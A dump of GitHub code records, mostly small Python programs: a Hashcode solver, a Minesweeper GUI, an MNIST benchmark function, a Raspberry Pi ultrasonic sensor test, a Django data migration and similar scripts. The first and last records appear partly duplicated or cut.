+{"seq_id":"22748477865","text":"import logging\n\nfrom parser import import_data, export_result\n\n# file_path = \"doc_given/a_example.in\"\n# result_path = \"result/a_example.out\"\n\n# file_path = \"doc_given/b_should_be_easy.in\"\n# result_path = \"result/b_should_be_easy.out\"\n\n# file_path = \"doc_given/c_no_hurry.in\"\n# result_path = \"result/c_no_hurry.out\"\n\n# file_path = \"doc_given/d_metropolis.in\"\n# result_path = \"result/d_metropolis.out\"\n\nfile_paths = [\n\"doc_given/a_example.in\",\n\"doc_given/b_should_be_easy.in\",\n\"doc_given/c_no_hurry.in\",\n\"doc_given/d_metropolis.in\",\n \"doc_given/e_high_bonus.in\"\n]\nresult_paths = [\n\"result/a_example.out\",\n\"result/b_should_be_easy.out\",\n\"result/c_no_hurry.out\",\n\"result/d_metropolis.out\",\n \"result/e_high_bonus.out\"\n]\n\n\ndef main():\n for i in range(0, len(file_paths)):\n file_path = file_paths[i]\n logging.error(file_path)\n result_path = 
+{"seq_id":"22748477865","text":"import logging\n\nfrom parser import import_data, export_result\n\n# file_path = \"doc_given/a_example.in\"\n# result_path = \"result/a_example.out\"\n\n# file_path = \"doc_given/b_should_be_easy.in\"\n# result_path = \"result/b_should_be_easy.out\"\n\n# file_path = \"doc_given/c_no_hurry.in\"\n# result_path = \"result/c_no_hurry.out\"\n\n# file_path = \"doc_given/d_metropolis.in\"\n# result_path = \"result/d_metropolis.out\"\n\nfile_paths = [\n\"doc_given/a_example.in\",\n\"doc_given/b_should_be_easy.in\",\n\"doc_given/c_no_hurry.in\",\n\"doc_given/d_metropolis.in\",\n \"doc_given/e_high_bonus.in\"\n]\nresult_paths = [\n\"result/a_example.out\",\n\"result/b_should_be_easy.out\",\n\"result/c_no_hurry.out\",\n\"result/d_metropolis.out\",\n \"result/e_high_bonus.out\"\n]\n\n\ndef main():\n for i in range(0, len(file_paths)):\n file_path = file_paths[i]\n logging.error(file_path)\n result_path = result_paths[i]\n general_info, rides_orig, vehicles = import_data(file_path)\n rides = sorted(rides_orig, key=lambda x: x.weight(), reverse=True)\n for i in range(0,general_info.steps):\n for v in vehicles:\n if v.fulluntil <= i and rides:\n j=0\n # while(True):\n v.rides.append(str(rides[0].i))\n v.fulluntil = i + rides[0].calculate_distance()\n rides.remove(rides[0])\n if len(rides) == 0:\n break\n\n export_result(result_path, vehicles)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"elvgarrui/Hashcode","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"72293017370","text":"from typing import Tuple\nfrom deliqc import dna\nfrom deliqc.sample.alignment import _simple_analyzer, _advanced_analyzer\nfrom deliqc.sample.result import FailedReadResult, AlignedReadResult\nfrom deliqc.sample.errors import TooManyMismatchesBetweenPair, TooManyMismatchesToReference, WeirdReads\n\n\nclass WorkerData:\n    def __init__(self, **kwargs):\n        self.kwargs = kwargs\n        self.kwargs[\"coordinates\"] = dna.get_codon_coordinates(kwargs[\"reference\"])\n        self.kwargs[\"read_length\"] = len(kwargs[\"reference\"])\n\n\ndef worker(data: Tuple[int, Tuple[str, str], WorkerData]):\n    read_number, (r1, r2), metadata = data\n    kwargs = metadata.kwargs\n\n    simple_failed = False\n    advanced_failed = False\n    too_many_mismatches_between_pair = False\n    too_many_mismatches_to_reference = False\n\n    ref_mismatches = 0\n    pair_mismatches = 0\n    read_indel_target = None\n\n    try:\n        result = _simple_analyzer(r1, r2, **kwargs)\n    except TooManyMismatchesBetweenPair:\n        simple_failed = True\n        too_many_mismatches_between_pair = True\n    except TooManyMismatchesToReference:\n        simple_failed = True\n        too_many_mismatches_to_reference = True\n\n    if simple_failed is True:\n        try:\n            result = _advanced_analyzer(r1, r2, **kwargs)\n        except TooManyMismatchesBetweenPair:\n            advanced_failed = True\n            too_many_mismatches_between_pair = True\n        except TooManyMismatchesToReference:\n            advanced_failed = True\n            too_many_mismatches_to_reference = True\n        except WeirdReads:\n            advanced_failed = True\n        else:\n            too_many_mismatches_between_pair = False\n            too_many_mismatches_to_reference = False\n\n    if advanced_failed is True:\n        if too_many_mismatches_between_pair:\n            result = FailedReadResult(FailedReadResult.tooManyMismatchesBetweenPair)\n\n        if too_many_mismatches_to_reference:\n            result = FailedReadResult(FailedReadResult.tooManyMismatchesToReference)\n\n    return result\n","repo_name":"Gillingham-Lab/deliqc","sub_path":"deliqc/sample/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"6529523856","text":"import tensorflow as tf\nimport tensorflow.keras as keras\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout\n\nimport time\nimport numpy as np\n\nclass FC_NN_test_function():\n    '''\n    Six hump camel function\n\n    :param bounds: the box constraints to define the domain in which the function is optimized.\n    :param sd: standard deviation, to generate noisy evaluations of the function.\n    '''\n\n    def __init__(self, max_time=0.18):\n        self.batch_size = 128\n        self.learning_rate = 0.001\n        self.rho = 0.9\n        self.epsilon = 1e-07\n        self.epochs = 3\n        self.samples = 5000\n        self.num_classes = 10\n        self.max_time = max_time\n\n\n    def f(self, X, true_val = False, verbose=0):\n        \"\"\"\n        Load Mnist data, creates a nueral network, create an\n        optimizer, put all three together and train. Finally\n        perform test and return test error.\n        \"\"\"\n        batch_size = self.batch_size\n        learning_rate = self.learning_rate\n        rho = self.rho\n        epsilon = self.epsilon\n        epochs = self.epochs\n        num_classes = self.num_classes\n\n        if len(X.shape) == 1:\n            X = np.array(X).reshape(1, -1)\n\n        validation_score = np.zeros((X.shape[0], 1))\n\n        for index in range(X.shape[0]):\n\n            x = X[index]\n            x = np.array(x).reshape(-1)\n            x = x.reshape(1, -1)\n            if true_val:\n                reps = 20\n            else:\n                reps = 1\n            out_val = []\n            for i in range(reps):\n                # Part 1: get the dataset\n                (x_train, y_train), (x_test, y_test) = mnist.load_data()\n                x_train = x_train.reshape(60000, 784)\n                x_test = x_test.reshape(10000, 784)\n                self.x_test = x_test\n                x_train = x_train.astype('float32')\n                x_test = x_test.astype('float32')\n                x_train /= 255\n                x_test /= 255\n                y_train = keras.utils.to_categorical(y_train, num_classes)\n                y_test = keras.utils.to_categorical(y_test, num_classes)\n\n                # Part 2: Make model\n\n                model = Sequential()\n                model.add(Dense(int(np.power(2, x[:, 2][0])), activation='relu', input_shape=(784,)))\n                model.add(Dropout(x[:, 0][0]))\n                model.add(Dense(int(np.power(2, x[:, 3][0])), activation='relu'))\n                model.add(Dropout(x[:, 1][0]))\n                model.add(Dense(num_classes, activation='softmax'))\n                if verbose == 1: model.summary()\n\n                # Part 3: Make optimizer\n                optimizer = tf.keras.optimizers.RMSprop(lr=learning_rate, rho=rho, epsilon=epsilon)\n\n                # Part 4: compile\n                model.compile(loss='categorical_crossentropy',\n                              optimizer=optimizer,\n                              metrics=['accuracy'])\n\n                # Part 5: train\n                # print(\"batch_size\", batch_size, \"epochs\", epochs)\n                history = model.fit(x_train, y_train,\n                                    batch_size=batch_size,\n                                    epochs=epochs,\n                                    verbose=verbose,\n                                    validation_data=(x_test, y_test))\n\n                self.model = model\n                # Part 6: get test measurements\n                score = model.evaluate(x_test, y_test, verbose=1)\n                out_val.append(score[1])\n            print(\"np.mean(out_val)\",np.mean(out_val))\n            print(\"np.std\", np.std(out_val))\n            print(\"mse\",np.std(out_val)/len(out_val) )\n            validation_score[index, 0] = np.mean(out_val)\n\n        return validation_score  # test classification error\n\n    def c(self, X, true_val=True, verbose=0):\n\n        batch_size = self.batch_size\n        learning_rate = self.learning_rate\n        rho = self.rho\n        epsilon = self.epsilon\n        epochs = self.epochs\n\n        if len(X.shape) == 1:\n            X = np.array(X).reshape(1, -1)\n\n        X_mean_average = np.zeros((X.shape[0], 1))\n        for index in range(X.shape[0]):\n\n            x = X[index]\n\n            self.f(x, verbose)\n\n            samples = self.samples\n            average_time = np.zeros(samples)\n            for i in range(samples):\n                start = time.time()\n                self.model.predict_classes(x=self.x_test, batch_size=batch_size)\n                stop = time.time()\n                average_time[i] = stop - start\n\n            # print(\"np.mean(average_time)\", np.mean(average_time))\n            # print(\"std\", np.std(average_time))\n            # print(\"mse\", np.std(average_time) / np.sqrt(len(average_time)))\n            X_mean_average[index, 0] = np.mean(average_time)\n\n        return X_mean_average - self.max_time\n\n# objective_function = FC_NN_test_function()\n# # print(\"Verbose execution\")\n# test_error = objective_function.c(X = np.array([[0.2,0.2,5,5],\n#                                                 [0.2,0.2,5,5]]), true_val=True, verbose=0)\n#\n# # test_error = objective_function.train_model(X = np.array([[0.2,0.2,9,9],\n# #                                                           [0.2,0.2,9,9]]), verbose=1)\n# print(\"Test error:\", test_error)\n\n\n","repo_name":"JuanUngredda/ParEGO_Last_Step","sub_path":"core/acquisition/Real_Experiments/FC_Neural_Network/real_functions_caller.py","file_name":"real_functions_caller.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27208021914","text":"from tkinter.messagebox import askyesno\n\n\ndef confirmation_messagebox(first_name: str, last_name: str) -> askyesno:\n    \"\"\"Print confirmation messagebox to delete contact from the Favorites\"\"\"\n\n    if last_name:\n        full_name = f\"{first_name} {last_name}\"\n    else:\n        full_name = first_name\n\n    answer = askyesno(title='Confirmation',\n                      message=f'Are you sure that you want to delete \\\"{full_name}\\\" from the Favorites?')\n\n    return answer\n","repo_name":"Kalinka5/Contact_book","sub_path":"Frames/Favorites/confirmation_messagebox.py","file_name":"confirmation_messagebox.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"35045127095","text":"from PPlay.mouse import *\nfrom PPlay.window import *\nfrom PPlay.gameimage import *\nfrom PPlay.sound import *\n\nimport carregar\nimport telas\nimport cenas\n\n\ndef menu_inicial():\n    try:\n        with open(\"arquivos_salvamento/jogo_finalizado\", \"r\") as arquivo:\n            jogo_fechado = arquivo.read()\n    except FileNotFoundError:\n        jogo_fechado = 0 \n\n    janela = Window(800, 600)\n    janela.set_title(\"Not a Hero!\")\n\n    janela.update()\n\n    mouse = Mouse()\n    click = True\n    cronometro_click = 0\n\n    titulo = GameImage(\"imagens/menu_inicial/titulo.png\")\n    titulo.x = 180\n    titulo.y = 10\n\n    fundo = GameImage(\"imagens/menu_inicial/fundo.png\")\n\n    botao_novo_jogo = GameImage(\"imagens/menu_inicial/botao_novo_jogo.png\")\n    botao_novo_jogo_plus = GameImage(\"imagens/menu_inicial/botao_novo_jogo_plus.png\")\n    botao_continuar = GameImage(\"imagens/menu_inicial/botao_continuar.png\")\n    botao_controles = GameImage(\"imagens/menu_inicial/botao_controles.png\")\n    botao_creditos = GameImage(\"imagens/menu_inicial/botao_creditos.png\")\n    botao_sair = GameImage(\"imagens/menu_inicial/botao_sair.png\")\n\n    botao_novo_jogo.x = janela.width / 2 - 80\n    botao_novo_jogo.y = 180\n\n    botao_novo_jogo_plus.x = botao_novo_jogo.x\n    botao_novo_jogo_plus.y = botao_novo_jogo.y + 60\n\n    botao_continuar.x = botao_novo_jogo.x\n    botao_continuar.y = botao_novo_jogo_plus.y + 60\n\n    botao_controles.x = botao_novo_jogo.x\n    botao_controles.y = botao_continuar.y + 60\n\n    botao_creditos.x = botao_novo_jogo.x\n    botao_creditos.y = botao_controles.y + 60\n\n    botao_sair.x = botao_novo_jogo.x\n    botao_sair.y = botao_creditos.y + 60\n\n    musica = Sound(\"musicas/musica_menu.ogg\")\n    musica.set_repeat(True)\n    musica.set_volume(5)\n\n    janela.update()\n\n    while True:\n\n        # Segurar Clicks em sequência\n        if click is False:\n            cronometro_click += janela.delta_time()\n\n            if cronometro_click >= 0.1:\n                click = True\n                cronometro_click = 0\n        \n        # Música\n        musica.play()\n\n        # Entrada de dados\n        if mouse.is_button_pressed(1) and mouse.is_over_object(botao_novo_jogo) and click:\n            musica.stop()\n            click = False\n            cenas.cena_inicial()\n        \n        if mouse.is_button_pressed(1) and mouse.is_over_object(botao_novo_jogo_plus) and click:\n            if int(jogo_fechado) == 0:\n                click = False\n                telas.tela_jogo_nao_fechado()\n                janela.update()\n            \n            if int(jogo_fechado) == 1:\n                musica.stop()\n                telas.tela_aviso_ngplus()\n        \n        if mouse.is_button_pressed(1) and mouse.is_over_object(botao_continuar) and click:\n            musica.stop()\n            click = False\n            carregar.carregar_progresso()\n            janela.update()\n        \n        if mouse.is_button_pressed(1) and mouse.is_over_object(botao_controles) and click:\n            click = False\n            telas.tela_controles()\n            janela.update()\n        \n        if mouse.is_button_pressed(1) and mouse.is_over_object(botao_creditos) and click:\n            click = False\n            telas.tela_creditos()\n            janela.update()\n        \n        if mouse.is_button_pressed(1) and mouse.is_over_object(botao_sair) and click:\n            click = False\n            janela.close()\n            break\n        \n        # Desenhos\n        fundo.draw()\n        titulo.draw()\n        botao_novo_jogo.draw()\n        botao_novo_jogo_plus.draw()\n        botao_continuar.draw()\n        botao_controles.draw()\n        botao_creditos.draw()\n        botao_sair.draw()\n\n        # Update\n        janela.update()","repo_name":"mjanibelli/not-a-hero","sub_path":"menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"26584509417","text":"#!/usr/bin/env python\nimport argparse\nimport os\nfrom Bio import AlignIO\n\ndef get_length(path):\n    totalLength = 0\n    n = 0\n    align = AlignIO.read(path, \"stockholm\")\n    for record in align:\n        n += 1\n        sequence = str(record.seq).replace(\"-\",\"\")\n        totalLength += len(sequence)\n    return int(totalLength/n),n\n\ndef main():\n    parser = argparse.ArgumentParser(description='Get average lengths of alignments (stockholm format) in input directory ')\n    parser.add_argument('--indir', '-i',required=True,help=\"Input dir contains stk files\")\n    parser.add_argument('--output','-o',required=True,help=\"Output table of average length\")\n    args = parser.parse_args()\n    fout = open(args.output,\"w\")\n    fout.write(\"rfam-id\\tlength\\tnumber\\n\")\n    for stk in os.listdir(args.indir):\n        rfamId = stk.split(\".\")[0]\n        path = os.path.join(args.indir,stk)\n        l, n = get_length(path)\n        fout.write(rfamId + \"\\t\" + str(l) + \"\\t\" + str(n) + \"\\n\")\n    fout.close()\n    \n    \n    \nif __name__ == \"__main__\":\n    main()\n","repo_name":"uaauaguga/bioinfo-utils","sub_path":"scripts/get-stk-length.py","file_name":"get-stk-length.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20180512408","text":"import numpy as np\r\nimport RPi.GPIO as GPIO\r\nimport time\r\nimport serial\r\n\r\n'''\r\n将超声波模块直接连接树莓派的GPIO引脚上\r\n这段程序是用于对超声波模块的测试\r\n'''\r\n\r\n# 设置警告信息为不输出\r\nGPIO.setwarnings(False)\r\n# 使用BCM针脚编号方式\r\nGPIO.setmode(GPIO.BCM)\r\n# 控制引脚GPIO22\r\ntrig = 22\r\n# 接收引脚GPIO17\r\necho = 17\r\n# 设置trig引脚为输出模式,初始化输出为低电平\r\nGPIO.setup(trig, GPIO.OUT, initial=GPIO.LOW)\r\n# 设置echo引脚为输入模式\r\nGPIO.setup(echo, GPIO.IN)\r\nHIGH = 1\r\nLOW = 0\r\n\r\n\r\ndef measure():\r\n\r\n    ms = []\r\n    i = 0\r\n    while i < 10:\r\n        # 树莓派向trig引脚发送信号,一个持续10us的方波脉冲\r\n        GPIO.output(trig, HIGH)\r\n        time.sleep(0.00001)\r\n        GPIO.output(trig, LOW)\r\n\r\n        # HC - SR04接收到脉冲信号,开始发送超声波并将Echo引脚置为高电平\r\n        # echo引脚之前一直接收低电平信号,一旦收到高电平信号就开始记录时间\r\n        while GPIO.input(echo) == LOW:\r\n            pass\r\n        start = time.time()\r\n        # 当 HC-SR04 接收到返回的超声波 时,把Echo引脚置为低电平\r\n        # 也就是说echo引脚接收到的高电平结束,终止计时\r\n        while GPIO.input(echo) == HIGH:\r\n            pass\r\n        end = time.time()\r\n\r\n        # 计算距离,单位厘米,这里的340m/s是超声波在空气中的传播速度\r\n        distance = round((end - start) * 340 / 2 * 100, 2)\r\n        # print(\"distance:{0}cm\".format(distance))\r\n        ms.append(distance)\r\n        i = i + 1\r\n\r\n    ms.remove(max(ms))\r\n    ms.remove(min(ms))\r\n    LEN = len(ms)\r\n    SUM = sum(ms)\r\n    average = SUM/LEN\r\n    if average < 32:\r\n        flag = '2'\r\n    elif 32 < average < 50:\r\n        flag = '1'\r\n    elif 50 < average:\r\n        flag = '0'\r\n    else:\r\n        flag = '3'\r\n\r\n    return flag\r\n\r\nprint(measure())\r\n","repo_name":"HardingPan/crane_vision","sub_path":"ultrasonic_ranging.py","file_name":"ultrasonic_ranging.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"25491382273","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/prison-cells-after-n-days/\n# Author: Miao Zhang\n# Date: 2021-03-29\n\nclass Solution:\n    def prisonAfterNDays(self, cells: List[int], n: int) -> List[int]:\n\n        def nextDay(cells):\n            return [int(i > 0 and i < 7 and cells[i - 1] == cells[i + 1])\n                    for i in range(8)]\n\n        seen = {}\n        while n > 0:\n            c = tuple(cells)\n            if c in seen:\n                n %= seen[c] - n\n            seen[c] = n\n\n            if n >= 1:\n                n -= 1\n                cells = nextDay(cells)\n        return cells\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/prisonCellsAfterNDays/prisonCellsAfterNDays.py","file_name":"prisonCellsAfterNDays.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"12373032373","text":"import random\n\n\ndef get_team_numbers(members):\n    \"\"\"\n    최대한 적은 수의 조가 편성되도로 조별 인원 산출 함수\n    7로 나눈 나머지가 5보다 작을 때에 한하여 조별 인원을 1명~2명씩 차감하는 식으로 계산\n    \"\"\"\n    member_len = len(members)\n    if member_len % 7 == 0:\n        team_number = [7] * (member_len//7)\n        return team_number\n    elif member_len % 7 >= 5:\n        team_number = [7] * (member_len//7)\n        team_number.append(member_len % 7)\n        return team_number\n    elif member_len % 7 < 5:\n        team_number = [7] * (member_len//7)\n        team_number.append(member_len % 7)\n        index=0\n        while team_number[-1] < 5 :\n            if team_number[index] == 5 :\n                index += 1\n            team_number[index] -= 1\n            team_number[-1] += 1\n        return team_number\n\n\ndef mix_member(members):\n\n    team_numbers = get_team_numbers(members)\n    output = {}\n    for i in range(len(team_numbers)) :\n        member_list = []\n        for j in range(team_numbers[i]) :\n            member_list.append(members.pop(random.randint(0, len(members)-1)))\n        output[f'{i+1}조'] = member_list\n    return output\n\n\nmembers = [i for i in range(100)]\noutput = mix_member(members)\nprint(output)\n","repo_name":"JunghoGIT/studycode","sub_path":"python/wish_cat/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"16590521888","text":"import sys\nimport time\nimport platform\nimport traceback\nfrom functools import partial\nfrom tkinter import (\n    Entry, Event, Label, PhotoImage, Toplevel,\n    Button, Frame, Menu, Tk, messagebox\n)\nfrom tkinter.font import Font, nametofont\nfrom os.path import dirname, realpath, join as pjoin\nfrom typing import Callable, Any, Dict\n\nfrom difficulty import Difficulty, EASY, MEDIUM, HARD\nfrom logic import Minesweeper, State\n\nBASE_PATH = dirname(realpath(sys.argv[0]))\n\nLEFT_CLICK = '<Button-1>'\nRIGHT_CLICK = '<Button-3>' if not platform.system() == 'Darwin' else '<Button-2>'\n\nAPPEARANCES: Dict[str, Any] = {\n    'text': {\n        'image': '',\n        'font': None,\n        'compound': 'center',\n        'bg': 'SystemButtonFace', 'fg': 'SystemButtonText',\n        'height': 1, 'width': 2, 'borderwidth': 1, 'padx': 2\n    },\n    'image': { 'text': '', 'height': 20, 'width': 20, 'padx': 0 },\n    'default': { 'text': ' ', 'relief': 'raised' },\n    'reveald': { 'state': 'disabled', 'relief': 'sunken' },\n    'flagged': { 'image': None },\n    'bomb': { 'image': None, 'bg': '#E74C3C' }\n}\n\n\nclass CustomDifficultyDialog(Toplevel):\n    def __init__(self, change_difficulty: Callable[[Difficulty], None], *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self._change_difficulty = change_difficulty\n\n        self.title('Custom Difficulty Dialog')\n        self.resizable(False, False)\n\n        self._entries = {}\n        for entry_name in ('rows', 'cols', 'bombs'):\n            frame = Frame(self)\n            Label(\n                frame,\n                text=f'{entry_name.title()}:',\n                width=10,\n                anchor='w',\n                justify='left'\n            ).pack(side='left')\n            entry = Entry(frame)\n            entry.pack(side='right', expand=1, fill='x')\n            self._entries[entry_name] = entry\n            frame.pack(side='top', expand=1, fill='x')\n\n        confirm_btn = Button(self, text='Confirm', command=self._onConfirm)\n        confirm_btn.pack(side='right')\n\n    def _onConfirm(self) -> None:\n        try:\n            rows = int(self._entries['rows'].get())\n            cols = int(self._entries['cols'].get())\n            bombs = int(self._entries['bombs'].get())\n        except ValueError:\n            messagebox.showerror(\n                'Invalid type!',\n                'At least one of the entries contains invalid data type.'\n            )\n            return\n        if rows == 0 or cols == 0 or bombs == 0:\n            messagebox.showerror(\n                'Invalid value!',\n                'At least one of the entries conains invalid value.'\n            )\n            return\n        if rows * cols <= bombs:\n            messagebox.showerror(\n                'Invalid value!',\n                'Number of bombs is too high for provided grid size.'\n            )\n            return\n\n        self.destroy()\n        self._change_difficulty(Difficulty('custom', rows, cols, bombs))\n\n\nclass App:\n    def __init__(self) -> None:\n        self._difficulty: Difficulty = EASY\n        self._minesweeper: Minesweeper\n        self._timer: float = 0.0\n\n        self._root = Tk()\n        self._root.title('Minesweeper')\n        self._root.resizable(False, False)\n        self._root.report_callback_exception = self._onError\n\n        # NOTE: It appears that wile font other than Consolas is in use, the size-changing\n        #       effect appears after replacing text with image and vice-versa. Allegedly\n        #       there is no easy way to remove this.\n        APPEARANCES['flagged']['image'] = PhotoImage(name='flag', file=pjoin(BASE_PATH, 'img/flag.png'))\n        APPEARANCES['bomb']['image'] = PhotoImage(name='bomb', file=pjoin(BASE_PATH, 'img/bomb.png'))\n        APPEARANCES['text']['font'] = nametofont('TkFixedFont')\n        if platform.system() == 'Windows':\n            APPEARANCES['text']['font'] = Font(family='Consolas', size=10)\n\n        self._game_frame = Frame(self._root)\n        self._game_frame.pack()\n\n        self._menu = Menu(self._root)\n        self._menu.add_command(label='New Game', command=self._newGame)\n\n        self._difficul_menu = Menu(self._menu, tearoff=False)\n        for difficulty in (EASY, MEDIUM, HARD):\n            self._difficul_menu.add_command(\n                label=difficulty.name.title(),\n                command=partial(self._setDifficulty, difficulty),\n            )\n        self._difficul_menu.add_command(\n            label='Custom difficulty',\n            command=partial(CustomDifficultyDialog, self._setDifficulty),\n        )\n\n        self._menu.add_cascade(label='Difficulty', menu=self._difficul_menu)\n\n        self._root.config(menu=self._menu)\n\n    def _setup(self) -> None:\n        rows = self._difficulty.rows\n        cols = self._difficulty.cols\n        for row in range(rows):\n            for col in range(cols):\n                element = Button(self._game_frame, **APPEARANCES['text'], **APPEARANCES['default'])\n                element.bind(LEFT_CLICK, partial(self._reveal, row, col))\n                element.bind(RIGHT_CLICK, partial(self._toggleFlag, row, col))\n                element.grid(row=row, column=col)\n\n    def _onError(self, exctype, excvalue, tb):\n        messagebox.showerror(\n            'Error', ''.join(traceback.format_exception(exctype, excvalue, tb))\n        )\n        self._root.destroy()\n\n    def _cleanGameFrame(self) -> None:\n        for widget in self._game_frame.winfo_children():\n            widget.destroy()\n\n    def _newGame(self):\n        self._cleanGameFrame()\n        self._minesweeper = Minesweeper(self._difficulty)\n        self._timer = 0.0\n        self._setup()\n\n    def _setDifficulty(self, difficulty: Difficulty) -> None:\n        self._difficulty = difficulty\n        self._newGame()\n\n    def _onLose(self) -> None:\n        if messagebox.showinfo('Game Over', 'You lost!'):\n            self._newGame()\n\n    def _onWin(self) -> None:\n        time_spent = time.perf_counter() - self._timer\n        if messagebox.showinfo('', f'You won!\\nIt took you: {round(time_spent, 2)} seconds.'):\n            self._newGame()\n\n    def _revealBombs(self):\n        for row, col in self._minesweeper.bombs:\n            bomb_btn = self._game_frame.grid_slaves(row=row, column=col)[0]\n            bomb_btn.configure(**APPEARANCES['image'], **APPEARANCES['bomb'])\n\n    def _reveal(self, row: int, col: int, _: Event) -> None:\n        if not self._timer:\n            self._timer = time.perf_counter()\n\n        changed_tiles = self._minesweeper.reveal(row, col)\n        for tile in changed_tiles:\n            btn = self._game_frame.grid_slaves(row=tile.row, column=tile.col)[0]\n            text = str(tile.bombsInNeighbor) if tile.bombsInNeighbor else ' '\n            btn.configure(text=text, **APPEARANCES['text'], **APPEARANCES['reveald'])  # type: ignore\n\n        if self._minesweeper.state == State.LOSE:\n            self._revealBombs()\n            self._onLose()\n\n    def _toggleFlag(self, row: int, col: int, event: Event) -> None:\n        btn = event.widget\n        try:\n            is_flagged = self._minesweeper.toggleFlag(row, col)\n            if is_flagged:\n                btn.configure(**APPEARANCES['image'], **APPEARANCES['flagged'])\n            else:\n                btn.configure(**APPEARANCES['text'], **APPEARANCES['default'])\n            if self._minesweeper.state == State.WIN:\n                self._onWin()\n        except ValueError:  # Will occure if already revealed tile is getting flagged\n            pass\n\n    def run(self) -> None:\n        self._newGame()\n        self._root.mainloop()\n\n\nif __name__ == '__main__':\n    App().run()\n","repo_name":"mkm5/minesweeper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30827591589","text":"import csv\nimport os\n\nfrom api.models import Town\n\nfrom django.db import migrations\nfrom django.conf import settings\n\n\ndef upload_csv(apps, schema_editor):\n    filename = os.path.join(settings.BASE_DIR, 'data/French Towns Data.csv')\n    with open(filename) as f:\n        reader = csv.reader(f)\n        for i, row in enumerate(reader):\n            if i > 1:\n                _, created = Town.objects.get_or_create(\n                    region_code=row[0],\n                    region_name=row[1],\n                    dept_code=row[2],\n                    distr_code=row[3],\n                    code=row[4],\n                    name=row[5],\n                    population=row[6],\n                    average_age=row[7],\n                )\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('api', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.RunPython(upload_csv),\n    ]\n","repo_name":"burgerfritz/botify-challenge","sub_path":"api/migrations/0002_auto_20190323_1125.py","file_name":"0002_auto_20190323_1125.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"16005963367","text":"'''\nAdd the associated peak_status to each point for a problem instance\nfor easier graphing\n'''\n\nimport sys\n\n\nif len(sys.argv) < 3:\n    print(\"Expected Usage:\\n\\n\\tpython add_peaks_to_fitness_counts_eigen_vals.py   \")\n    sys.exit(1)\n\npeak_file = sys.argv[1]\ndata_file = sys.argv[2]\noutput_data_file = sys.argv[3]\n\npeak_file_read = open(peak_file, \"r\")\ndata_file_read = open(data_file, \"r\")\noutput_data_file_write = open(output_data_file, \"w\")\noutput_data_file_write.write(\"id,count,eigen_cent,fitness,is_peak\\n\")\n\n\npeaks = list()\n\n\nfor line in peak_file_read:\n    #Read eigen_vals by node into dict\n    peak = line.strip()\n    peaks.append(peak)\n\nfor line in data_file_read:\n    #split line by comma\n    if 'id' in line:\n        continue\n    components = line.strip().split(',')\n    #If peak is in list of peaks set value to True\n    is_peak = False\n    if components[0] in peaks:\n        is_peak = True\n    #Output values for each line to output file\n    output_data_file_write.write(str(components[0]) + ',' + str(components[1]) + ',' + str(components[2]) + ',' + str(components[3]) + ',' + str(is_peak) + \"\\n\")\n","repo_name":"thomasgreen79/Landscape_Ansys","sub_path":"scripts/add_peaks_to_fitness_counts_eigen_vals.py","file_name":"add_peaks_to_fitness_counts_eigen_vals.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
new_y1.append(y[p])\n    else:\n        new_x0.append(X[p,:])\n        new_y0.append(y[p])\n\nX=np.array(new_x1+new_x0)\ny=np.array(new_y1+new_y0)\n\nX=X[0:2000,:]\ny=y[0:2000]\n\n\nnp.savetxt('X_new_features_2000x150.csv', X, delimiter=',',fmt=\"%d\")\nnp.savetxt('y_new_features_2000.csv', y, delimiter=',',fmt=\"%d\")\n\nnp.save('x_matrix_2000x150.npy',X)\nnp.save('y_matrix_2000.npy',y)\n\n\n","repo_name":"RajaAyyanar/NLP_CauseEffectRelation","sub_path":"dot1.py","file_name":"dot1.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
